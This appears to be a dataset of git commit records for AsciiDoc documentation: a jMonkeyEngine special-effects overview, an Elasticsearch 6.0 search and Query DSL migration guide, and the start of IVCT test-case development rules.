If you add a pass to this list, it\u2019ll be automatically rendered by the FilterPostProcessor during the filter chain.\n\nThe bloom Filter does an intensive use of passes.\n\nFilters in a nutshell.\n\nSee also:\n\n* xref:jme3\/advanced\/particle_emitters.adoc[Particle Emitters]\n* xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow]\n* link:http:\/\/www.smashingmagazine.com\/2008\/08\/07\/50-photoshop-tutorials-for-sky-and-space-effects\/[Photoshop Tutorial for Sky and space effects (article)]\n","old_contents":"= jME3 Special Effects Overview\n:revnumber: 2.1\n:revdate: 2020\/07\/22\n:keywords: documentation, effect, light, water\n:uri-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\/\n:img-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/master\/\n:uri-forum: https:\/\/hub.jmonkeyengine.org\/\n\n\n\njME3 supports several types of special effects: Post-Processor Filters, SceneProcessors, and Particle Emitters (also known as particle systems). This list contains screenshots and links to sample code that demonstrates how to add the effect to a scene.\n\n\n\n== Sample Code\n\n* There is one `com.jme3.effect.ParticleEmitter` class for all Particle Systems.\n* There is one `com.jme3.post.FilterPostProcessor` class and several `com.jme3.post.filters.` (all Filters have `Filter` in their names).\n* There are several `SceneProcessor` classes in various packages, including e.g. `com.jme3.shadow.` and `com.jme3.water.` (SceneProcessor have `Processor` or `Renderer` in their names).\n\n\n=== Particle Emitter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n public void simpleInitApp() {\n ParticleEmitter pm = new ParticleEmitter(\"my particle effect\", Type.Triangle, 60);\n Material pmMat = new Material(assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n pmMat.setTexture(\"Texture\", assetManager.loadTexture(\"Effects\/spark.png\"));\n pm.setMaterial(pmMat);\n pm.setImagesX(1);\n pm.setImagesY(1);\n rootNode.attachChild(pm); \/\/ attach one or more emitters to any node\n }\n}\n\n----\n\n\n=== Scene Processor\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private BasicShadowRenderer bsr;\n\n public void simpleInitApp() {\n bsr = new BasicShadowRenderer(assetManager, 1024);\n bsr.setDirection(new Vector3f(.3f, -0.5f, -0.5f));\n viewPort.addProcessor(bsr); \/\/ add one or more sceneprocessor to viewport\n }\n...\n}\n----\n\n\n\n=== Post-Processor Filter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private FilterPostProcessor fpp; \/\/ one FilterPostProcessor per app\n private SomeFilter sf; \/\/ one or more Filters per app\n\n public void simpleInitApp() {\n fpp = new FilterPostProcessor(assetManager);\n viewPort.addProcessor(fpp); \/\/ add one FilterPostProcessor to viewPort\n\n sf = new SomeFilter();\n fpp.addFilter(sf); \/\/ add one or more Filters to FilterPostProcessor\n }\n...\n}\n----\n\n\n\n== Water\n\n[.center]\nimage:effect\/water-post.png[water-post.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/water.png[water.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/water-reflection-muddy.png[water-reflection-muddy.png,width=\"150\",height=\"100\",align=\"center\"]\nimage:effect\/underwater2.jpg[underwater2.jpg,width=\"150\",height=\"100\",align=\"center\"]\n\nThe jMonkeyEngine xref:jme3\/advanced\/water.adoc[\"`SeaMonkey WaterFilter`\"] simulates ocean waves, foam, including cool underwater caustics. 
+\nUse the SimpleWaterProcessor (SceneProcessor) for small, limited bodies of water, such as puddles, drinking troughs, pools, fountains.\n\nSee also:\n\n* link:{uri-forum}t\/monkeys-at-the-beach\/15000[Rendering Water as Post-Process Effect] announcement with video.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSceneWater.java[TestSceneWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSimpleWater.java[TestSimpleWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWater.java[TestPostWater.java] \u2013 WaterFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWaterLake.java[TestPostWaterLake.java] \u2013 WaterFilter.\n\n\n== Environment Effects\n\n=== Depth of Field Blur\n\nimage:effect\/dof-blur.png[dof-blur.png,width=\"150\",height=\"100\"]\nimage:effect\/light-scattering-filter.png[light-scattering-filter.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestDepthOfField.java[TestDepthOfField.java] \u2013 DepthOfFieldFilter.\n\n\n=== Fog\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestFog.java[TestFog.java] \u2013 FogFilter.\n\n\n\n=== Light Scattering\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestLightScattering.java[TestLightScattering.java] \u2013 LightScatteringFilter.\n\n\n\n=== Vegetation\n\n* Contribution: xref:jme3\/contributions\/vegetationsystem\/grass.adoc[Grass System]\n* Contribution: {uri-forum}t\/generating-vegetation-paged-geometry-style\/18928[Trees (WIP)]\n\n\n\n== Light and Shadows\n\n\n\n=== Bloom and Glow\n\nimage:effect\/tanlglow1.png[tanlglow1.png,width=\"150\",height=\"100\"]\nimage:effect\/shadow-sponza-ssao.png[shadow-sponza-ssao.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestBloom.java[TestBloom.java]\n* More details: xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow] \u2013 BloomFilter.\n\n\n\n=== Light\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestSimpleLighting.java[TestSimpleLighting.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestLightRadius.java[TestLightRadius.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestManyLights.java[TestManyLights.java] \u2013 .j3o scene.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n=== Shadow\n\nimage:effect\/shadow.png[shadow.png,width=\"150\",height=\"100\"]\nimage:light\/light-sources.png[light-sources.png,width=\"150\",height=\"100\"]\n\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestShadow.java[TestShadow.java] \u2013 BasicShadowRenderer. 
(SceneProcessor)\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestPssmShadow.java[TestPssmShadow.java] \u2013 PssmShadowRenderer (SceneProcessor), also known as Parallel-Split Shadow Mapping (PSSM).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO.java[TestSSAO.java], link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO2.java[TestSSAO2.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentSSAO.java[TestTransparentSSAO.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSOA), plus transparancy.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n== Special: Glass, Metal, Dissolve, Toon\n\n\n\n=== Toon Effect\n\nimage:effect\/toon-dino.png[toon-dino.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestCartoonEdge.java[TestCartoonEdge.java] \u2013 CartoonEdgeFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentCartoonEdge.java[TestTransparentCartoonEdge.java] \u2013 CartoonEdgeFilter.\n\n\n\n=== Fade in \/ Fade out\n\n* xref:jme3\/advanced\/fade.adoc[Fade] \u2013 FadeFilter\n\n\n\n=== User Contributed\n\nimage:effect\/shaderblow_light1.jpg[shaderblow_light1.jpg,width=\"78\",height=\"150\"]\nimage:effect\/shaderblow_glass.jpg[shaderblow_glass.jpg,width=\"80\",height=\"150\"]\nimage:sdk:plugin\/shaderblow_matcap.jpg[shaderblow_matcap.jpg,width=\"150\",height=\"150\"]\nimage:effect\/shaderblow_light2.jpg[shaderblow_light2.jpg,width=\"66\",height=\"150\"]\n\nxref:sdk:plugin\/shaderblow.adoc[ShaderBlow - GLSL Shader Library]\n\n* LightBlow Shader \u2013 blend material texture maps.\n* FakeParticleBlow Shader \u2013 jet, fire effect.\n* ToonBlow Shader \u2013 Toon Shading, toon edges.\n* Dissolve Shader \u2013 Scifi teleportation\/dissolve effect.\n* MatCap Shader \u2013 Gold, metals, glass, toons\u2026!\n* Glass Shader \u2013 Glass.\n* Force Shield Shader \u2013 Scifi impact-on-force-field effect.\n* SimpleSprite Shader \u2013 Animated textures.\n* SimpleSpriteParticle Shader \u2013 Sprite library.\n* MovingTexture Shader \u2013 Animated cloud\/mist texture.\n* SoftParticles Shader \u2013 Fire, clouds, smoke etc.\n* Displace Shader \u2013 Deformation effect: Ripple, wave, pulse, swell!\n\nThanks for your awesome contributions! Keep them coming!\n\n\n\n== Particle Emitters: Explosions, Fire, Smoke\n\nimage:effect\/explosion-5.png[explosion-5.png,width=\"150\",height=\"100\"]\nimage:effect\/particle.png[particle.png,width=\"150\",height=\"100\"]\n\nxref:jme3\/advanced\/particle_emitters.adoc[Particle emitter effects] are highly configurable and can have any texture. 
They can simulate smoke, dust, leaves, meteors, snowflakes, mosquitos, fire, explosions, clusters, embers, sparks\u2026\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestExplosionEffect.java[TestExplosionEffect.java] \u2013 debris, flame, flash, shockwave, smoke, sparks.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestPointSprite.java[TestPointSprite.java] \u2013 cluster of points.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestMovingParticle.java[TestMovingParticle.java] \u2013 dust, smoke.\n\n\n=== Creating your own Filters\n\nHere is an extract taken from @nehon in the forum thread (link:{uri-forum}t\/how-exactly-do-filters-work\/26871[http:\/\/hub.jmonkeyengine.org\/forum\/topic\/how-exactly-do-filters-work\/])\n\nThe methods are called in this order (pretty much the same flow as processors):\n- initFilter() is called once when the FilterPostPorcessor is initialized or when the filter is added to the processor and this one as already been initialized.\n\nfor each frame the methods are called in that sequence :\n- preFrame() occurs before anything happens\n- postQueue() occcurs once the queues have been populated (there is one queue per bucket and 2 additional queues for the shadows, casters and recievers). Note that geometries in the queues are the one in the view frustum.\n- postFrame occurs once the main frame has been rendered (the back buffer)\n\nThose methods are optional in a filter, they are only there if you want to hook in the rendering process.\n\nThe material variable is here for convenience. You have a getMaterial method that returns the material that\u2019s gonna be used to render the full screen quad. It just happened that in every implementation I had a material attribute in all my sub-classes, so I just put it back in the abstract class. Most of the time getMaterial returns this attribute.\n\nForced-technique can be any technique really, they are more related with the material system than to the filters but anyway. When you use a forced technique the renderer tries to select it on the material of each geometry, if the technique does not exists for the material the geometry is not rendered.\nYou assume well about the SSAO filer, the normal of the scene are rendered to a texture in a pre pass.\n\nPasses : these are filters in filters in a way. First they are a convenient way to initialize a FrameBuffer and the associated textures it needs, then you can use them for what ever you want.\nFor example, a Pass can be (as in the SSAO filter) an extra render of the scene with a forced technique, and you have to handle the render yourself in the postQueue method.\nIt can be a post pass to do after the main filter has been rendered to screen (for example an additional blur pass used in SSAO again). You have a list of passes called postRenderPass in the Filter abstract class. 
If you add a pass to this list, it\u2019ll be automatically rendered by the FilterPostProcessor during the filter chain.\n\nThe bloom Filter does an intensive use of passes.\n\nFilters in a nutshell.\n\nSee also:\n\n* xref:jme3\/advanced\/particle_emitters.adoc[Particle Emitters]\n* xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow]\n* link:http:\/\/www.smashingmagazine.com\/2008\/08\/07\/50-photoshop-tutorials-for-sky-and-space-effects\/[Photoshop Tutorial for Sky and space effects (article)]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4673ee7e7737be92edee3901593bcecd7b320b6d","subject":"Minor edit","message":"Minor edit","repos":"strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/search.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/search.asciidoc","new_contents":"[[breaking_60_search_changes]]\n=== Search and Query DSL changes\n\n==== Changes to queries\n\n* The `collect_payloads` parameter of the `span_near` query has been removed. Payloads will be\n loaded when needed.\n\n* Queries on boolean fields now strictly parse boolean-like values. This means\n only the strings `\"true\"` and `\"false\"` will be parsed into their boolean\n counterparts. Other strings will cause an error to be thrown.\n\n* The `in` query (a synonym for the `terms` query) has been removed.\n\n* The `geo_bbox` query (a synonym for the `geo_bounding_box` query) has been removed.\n\n* The `mlt` query (a synonym for the `more_like_this` query) has been removed.\n\n* The deprecated `like_text`, `ids` and `docs` parameters (all synonyms for `like`) of the `more_like_this` query have\nbeen removed. Also the deprecated `min_word_len` (a synonym for `min_word_length`) and `max_word_len` \n(a synonym for `max_word_length`) have been removed.\n\n* The `fuzzy_match` and `match_fuzzy` queries (synonyms for the `match` query) have been removed.\n\n* The `terms` query now always returns scores equal to `1` and is not subject to\n `indices.query.bool.max_clause_count` anymore.\n\n* The deprecated `indices` query has been removed.\n\n* Support for empty query objects (`{ }`) has been removed from the query DSL.\n An error is thrown whenever an empty query object is provided.\n\n* The deprecated `minimum_number_should_match` parameter in the `bool` query has\n been removed, use `minimum_should_match` instead.\n\n* The `query_string` query now correctly parses the maximum number of\n states allowed when\n \"https:\/\/en.wikipedia.org\/wiki\/Powerset_construction#Complexity[determinizing]\"\n a regex as `max_determinized_states` instead of the typo\n `max_determined_states`.\n\n* The `query_string` query no longer accepts `enable_position_increment`, use\n `enable_position_increments` instead.\n\n* For `geo_distance` queries, sorting, and aggregations the `sloppy_arc` option\n has been removed from the `distance_type` parameter.\n\n* The `geo_distance_range` query, which was deprecated in 5.0, has been removed.\n\n* The `optimize_bbox` parameter has been removed from `geo_distance` queries.\n\n* The `ignore_malformed` and `coerce` parameters have been removed from\n `geo_bounding_box`, `geo_polygon`, and `geo_distance` queries.\n\n* The `disable_coord` parameter of the `bool` and `common_terms` queries has\n been removed. 
If provided, it will be ignored and issue a deprecation warning.\n\n* The `template` query has been removed. This query was deprecated since 5.0.\n\n* The `percolate` query's `document_type` has been deprecated. From 6.0 and later\n it is no longer required to specify the `document_type` parameter.\n\n* The `split_on_whitespace` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `query_string` query now splits on operator only.\n\n* The `use_dis_max` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `tie_breaker` parameter must be used instead.\n\n* The `auto_generate_phrase_queries` parameter for the `query_string` query has been removed,\n use an explicit quoted query instead.\n If provided, it will be ignored and issue a deprecation warning.\n\n* The `all_fields` parameter for the `query_string` has been removed.\n Set `default_field` to `*` instead.\n If provided, `default_field` will be automatically set to `*`.\n\n* The `index` parameter in the terms filter, used to look up terms in a dedicated index, is\n now mandatory. Previously, the index defaulted to the index the query was executed on. Now this index\n must be explicitly set in the request.\n\n* The deprecated `type` and `slop` parameters for the `match` query have been removed. Instead of\nsetting the `type`, the `match_phrase` or `match_phrase_prefix` query should be used. The `slop` parameter was removed from\nthe `match` query but is still supported for `match_phrase` and `match_phrase_prefix`.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `match_phrase` query has been removed.\n\n* The deprecated `query` parameter (a synonym for the `filter` parameter) of the `constant_score` query has been removed.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `multi_match` query has been removed.\n\n* The deprecated `prefix` parameter (a synonym for the `value` parameter) of the `prefix` query has been removed.\n\n* The deprecated `le` (a synonym for `lte`) and `ge` (a synonym for `gte`) parameters of the `range` query have been removed.\n\n* The deprecated multi term rewrite parameters `constant_score_auto` and `constant_score_filter` (synonyms for `constant_score`)\nhave been removed.\n\n
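As a concrete example of one of these renames, a `bool` query that previously used `minimum_number_should_match` is now written with `minimum_should_match`. The index and field names below are made up purely for illustration:\n\n[source,js]\n----\nGET \/my-index\/_search\n{\n \"query\": {\n \"bool\": {\n \"should\": [\n { \"term\": { \"tags\": \"alpha\" } },\n { \"term\": { \"tags\": \"beta\" } }\n ],\n \"minimum_should_match\": 1\n }\n }\n}\n----\n\n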
==== Search shards API\n\nThe search shards API no longer accepts the `type` url parameter, which didn't\nhave any effect in previous versions.\n\n==== Changes to the Profile API\n\nThe `\"time\"` field showing human readable timing output has been replaced by the `\"time_in_nanos\"`\nfield which displays the elapsed time in nanoseconds. The `\"time\"` field can be turned on by adding\n`\"?human=true\"` to the request url. It will display a rounded, human readable time value.\n\n==== Scoring changes\n\n===== Query normalization\n\nQuery normalization has been removed. This means that the TF-IDF similarity no\nlonger tries to make scores comparable across queries and that boosts are now\nintegrated into scores as simple multiplicative factors.\n\nOther similarities are not affected as they did not normalize scores and\nalready integrated boosts into scores as multiplicative factors.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n===== Coordination factors\n\nCoordination factors have been removed from the scoring formula. This means that\nboolean queries no longer score based on the number of matching clauses.\nInstead, they always return the sum of the scores of the matching clauses.\n\nAs a consequence, use of the TF-IDF similarity is now discouraged as this was\nan important component of the quality of the scores that this similarity\nproduces. BM25 is recommended instead.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n==== Fielddata on `_uid`\n\nFielddata on `_uid` is deprecated. It is possible to switch to `_id` instead\nbut the only reason why it has not been deprecated too is because it is used\nfor the `random_score` function. If you really need access to the id of\ndocuments for sorting, aggregations or search scripts, the recommendation is\nto duplicate the id as a field in the document.\n\n==== Highlighters\n\nThe `unified` highlighter is the new default choice for highlighter.\nThe offset strategy for each field is picked internally by this highlighter depending on the\ntype of the field (`index_options`).\nIt is still possible to force the highlighter to `fvh` or `plain` types.\n\nThe `postings` highlighter has been removed from Lucene and Elasticsearch.\nThe `unified` highlighter outputs the same highlighting when `index_options` is set\n to `offsets`.\n\n==== `fielddata_fields`\n\nThe deprecated `fielddata_fields` have now been removed. `docvalue_fields` should be used instead.\n\n==== `docvalue_fields`\n\n`docvalue_fields` now have a default upper limit of 100 fields that can be requested.\nThis limit can be overridden by using the `index.max_docvalue_fields_search` index setting.\n\n==== `script_fields`\n\n`script_fields` now have a default upper limit of 32 script fields that can be requested.\nThis limit can be overridden by using the `index.max_script_fields` index setting.\n\n==== Inner hits\n\nThe source inside a hit of inner hits keeps its full path with respect to the entire source.\nIn prior versions the source field names were relative to the inner hit.\n\n==== Scroll\n\nThe `from` parameter can no longer be used in the search request body when initiating a scroll.\nThe parameter was already ignored in these situations, now in addition an error is thrown.\n\n==== Limit on from\/size in top hits and inner hits\n\nThe maximum number of results (`from` + `size`) that is allowed to be retrieved\nvia inner hits and top hits has been limited to 100. The limit can be controlled\nvia the `index.max_inner_result_window` index setting.\n\n==== Scroll queries that use the request_cache are deprecated\n\nSetting `request_cache:true` on a query that creates a scroll (`scroll=1m`)\n is deprecated and the request will not use the cache internally.\nIn future versions we will return a `400 - Bad request` instead of just ignoring\nthe hint.\nScroll queries are not meant to be cached.\n","old_contents":"[[breaking_60_search_changes]]\n=== Search and Query DSL changes\n\n==== Changes to queries\n\n* The `collect_payloads` parameter of the `span_near` query has been removed. Payloads will be\n loaded when needed.\n\n* Queries on boolean fields now strictly parse boolean-like values. This means\n only the strings `\"true\"` and `\"false\"` will be parsed into their boolean\n counterparts. 
Other strings will cause an error to be thrown.\n\n* The `in` query (a synonym for the `terms` query) has been removed\n\n* The `geo_bbox` query (a synonym for the `geo_bounding_box` query) has been removed\n\n* The `mlt` query (a synonym for the `more_like_this` query) has been removed.\n\n* The deprecated `like_text`, `ids` and `docs` parameters (all synonyms for `like`) of the `more_like_this` query have\nbeen removed. Also the deprecated `min_word_len` (a synonym for `min_word_length`) and `max_word_len` \n(a synonym for `max_word_length`) have been removed.\n\n* The `fuzzy_match` and `match_fuzzy` query (synonyma for the `match` query) have been removed\n\n* The `terms` query now always returns scores equal to `1` and is not subject to\n `indices.query.bool.max_clause_count` anymore.\n\n* The deprecated `indices` query has been removed.\n\n* Support for empty query objects (`{ }`) has been removed from the query DSL.\n An error is thrown whenever an empty query object is provided.\n\n* The deprecated `minimum_number_should_match` parameter in the `bool` query has\n been removed, use `minimum_should_match` instead.\n\n* The `query_string` query now correctly parses the maximum number of\n states allowed when\n \"https:\/\/en.wikipedia.org\/wiki\/Powerset_construction#Complexity[determinizing]\"\n a regex as `max_determinized_states` instead of the typo\n `max_determined_states`.\n\n* The `query_string` query no longer accepts `enable_position_increment`, use\n `enable_position_increments` instead.\n\n* For `geo_distance` queries, sorting, and aggregations the `sloppy_arc` option\n has been removed from the `distance_type` parameter.\n\n* The `geo_distance_range` query, which was deprecated in 5.0, has been removed.\n\n* The `optimize_bbox` parameter has been removed from `geo_distance` queries.\n\n* The `ignore_malformed` and `coerce` parameters have been removed from\n `geo_bounding_box`, `geo_polygon`, and `geo_distance` queries.\n\n* The `disable_coord` parameter of the `bool` and `common_terms` queries has\n been removed. If provided, it will be ignored and issue a deprecation warning.\n\n* The `template` query has been removed. This query was deprecated since 5.0\n\n* The `percolate` query's `document_type` has been deprecated. From 6.0 and later\n it is no longer required to specify the `document_type` parameter.\n\n* The `split_on_whitespace` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `query_string` query now splits on operator only.\n\n* The `use_dismax` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `tie_breaker` parameter must be used instead.\n\n* The `auto_generate_phrase_queries` parameter for the `query_string` query has been removed,\n use an explicit quoted query instead.\n If provided, it will be ignored and issue a deprecation warning.\n\n* The `all_fields` parameter for the `query_string` has been removed.\n Set `default_field` to *` instead.\n If provided, `default_field` will be automatically set to `*`\n\n* The `index` parameter in the terms filter, used to look up terms in a dedicated index is\n now mandatory. Previously, the index defaulted to the index the query was executed on. Now this index\n must be explicitly set in the request.\n\n* The deprecated `type` and `slop` parameter for the `match` query have been removed. 
Instead of\nsetting the `type`, the `match_phrase` or `match_phrase_prefix` should be used. The `slop` removed from\nthe `match` query but is supported for `match_phrase` and `match_phrase_prefix`.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `match_phrase` query has been removed.\n\n* The deprecated `query` parameter (a synonym for the `filter` parameter) of the `constant_score` query has been removed.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `multi_match` query has been removed.\n\n* The deprecated `prefix` parameter (a synonym for the `value` parameter) of the `prefix` query has been removed.\n\n* The deprecated `le` (a synonym for `lte`) and `ge` (a synonym for `gte`) parameter of the `range` query have been removed.\n\n* The deprecated multi term rewrite parameters `constant_score_auto`, `constant_score_filter` (synonyms for `constant_score`)\nhave been removed.\n\n==== Search shards API\n\nThe search shards API no longer accepts the `type` url parameter, which didn't\nhave any effect in previous versions.\n\n==== Changes to the Profile API\n\nThe `\"time\"` field showing human readable timing output has been replaced by the `\"time_in_nanos\"`\nfield which displays the elapsed time in nanoseconds. The `\"time\"` field can be turned on by adding\n`\"?human=true\"` to the request url. It will display a rounded, human readable time value.\n\n==== Scoring changes\n\n===== Query normalization\n\nQuery normalization has been removed. This means that the TF-IDF similarity no\nlonger tries to make scores comparable across queries and that boosts are now\nintegrated into scores as simple multiplicative factors.\n\nOther similarities are not affected as they did not normalize scores and\nalready integrated boosts into scores as multiplicative factors.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n===== Coordination factors\n\nCoordination factors have been removed from the scoring formula. This means that\nboolean queries no longer score based on the number of matching clauses.\nInstead, they always return the sum of the scores of the matching clauses.\n\nAs a consequence, use of the TF-IDF similarity is now discouraged as this was\nan important component of the quality of the scores that this similarity\nproduces. BM25 is recommended instead.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n==== Fielddata on `_uid`\n\nFielddata on `_uid` is deprecated. It is possible to switch to `_id` instead\nbut the only reason why it has not been deprecated too is because it is used\nfor the `random_score` function. If you really need access to the id of\ndocuments for sorting, aggregations or search scripts, the recommendation is\nto duplicate the id as a field in the document.\n\n==== Highlighters\n\nThe `unified` highlighter is the new default choice for highlighter.\nThe offset strategy for each field is picked internally by this highlighter depending on the\ntype of the field (`index_options`).\nIt is still possible to force the highlighter to `fvh` or `plain` types.\n\nThe `postings` highlighter has been removed from Lucene and Elasticsearch.\nThe `unified` highlighter outputs the same highlighting when `index_options` is set\n to `offsets`.\n\n==== `fielddata_fields`\n\nThe deprecated `fielddata_fields` have now been removed. 
`docvalue_fields` should be used instead.\n\n==== `docvalue_fields`\n\n`docvalue_fields` now have a default upper limit of 100 fields that can be requested.\nThis limit can be overridden by using the `index.max_docvalue_fields_search` index setting.\n\n==== `script_fields`\n\n`script_fields` now have a default upper limit of 32 script fields that can be requested.\nThis limit can be overridden by using the `index.max_script_fields` index setting.\n\n==== Inner hits\n\nThe source inside a hit of inner hits keeps its full path with respect to the entire source.\nIn prior versions the source field names were relative to the inner hit.\n\n==== Scroll\n\nThe `from` parameter can no longer be used in the search request body when initiating a scroll.\nThe parameter was already ignored in these situations, now in addition an error is thrown.\n\n==== Limit on from\/size in top hits and inner hits\n\nThe maximum number of results (`from` + `size`) that is allowed to be retrieved\nvia inner hits and top hits has been limited to 100. The limit can be controlled\nvia the `index.max_inner_result_window` index setting.\n\n==== Scroll queries that use the request_cache are deprecated\n\nSetting `request_cache:true` on a query that creates a scroll ('scroll=1m`)\n is deprecated and the request will not use the cache internally.\nIn future versions we will return a `400 - Bad request` instead of just ignoring\nthe hint.\nScroll queries are not meant to be cached.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b934f9ad683206963a4bcd8e67c2144a1644b2a3","subject":"Update Executable-Test-Case-Development-Rules.adoc","message":"Update Executable-Test-Case-Development-Rules.adoc\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/Executable-Test-Case-Development-Rules.adoc","new_file":"docs\/src\/Executable-Test-Case-Development-Rules.adoc","new_contents":"== Executable Test Case Development Rules\n\nThese rules were discussed between nations on 18 October 2016.\n\n=== RTI compatibility\nThe ETC must be developed and tested with both the Pitch and M\u00c4K RTIs, using the latest versions if possible.\nSome specific libraries (RTI adapters) will be developed and integrated into IVCT. ETC development must be done upon those RTI adapters.\n\n=== Overall ETC structure\n\n==== GitHub project name \/ Java package project name \/ Class names\nGitHub Repository name: TC_[ETC name]\nEx.: `TC_CS_Verification`\n\nExample:\n----\nTC_CS_Verification\n----\n\nJava main package name: nato.ivct.etc.tc_[ETC name], e.g.:\n----\nnato.ivct.etc.tc_cs_verification\nnato.ivct.etc.fr.tc_hla_declaration_management\n----\n\nMain class names: TC_XXXX_[meaningful name].java.\nN.B.: [meaningful name] is meaningful in the context of the ETC, and is different from [ETC name] to avoid redundancy.\n\nExample for ETC HLA Declaration Management:\n----\nTC_0001_Object_Publication.java\nTC_0002_Interaction_Subscription.java\n----\n\nJava model and parameters package name: nato.ivct.etc.tc_**lib_**[ETC name], e.g.:\n----\nnato.ivct.etc.tc_lib_cs_verification\nnato.ivct.etc.fr.tc_lib_hla_declaration_management\n----\n\nETC model and parameters class names: TC_[ETC name]_BaseModel.java and TC_[ETC name]_TcParam.java, e.g.:\n----\nTC_CS_Verification_BaseModel.java\nTC_CS_Verification_TcParam.java\n----\n\nNOTE: **Warning:** The full name of a class may be very long, e.g.: `nato.ivct.etc.tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== 3rd Party Libraries\nBecause one of the main problems with Java development is the management of dependencies (i.e. libraries), _**all new development (new ETC) must use already existing libraries**_. This will avoid inconsistencies and incompatibilities between code developed by different developers who may use different versions of the same library.\nAll 3rd party libraries must be declared in the ETC Gradle files, as is done in the HelloWorld example.\n\n**Question:** Where must new 3rd party libraries be dropped off? It seems that Gradle manages some cache.\n\n**Question:** How does one access the list of libraries already used by developed ETCs? Who is responsible for the management of that list?\n\n=== Development Best Practices\n==== Test Case Parameters\nIt is mandatory to use a JSON file to define parameter values.\nThere are 3 steps in the initialization of Test Case Parameters (file `TC_[ETC name]_TcParam.java`):\n\n. Declaration with a NULL value\n. Assignment to the value read using the JSON parser\n. Systematic check to detect invalid values\n\n
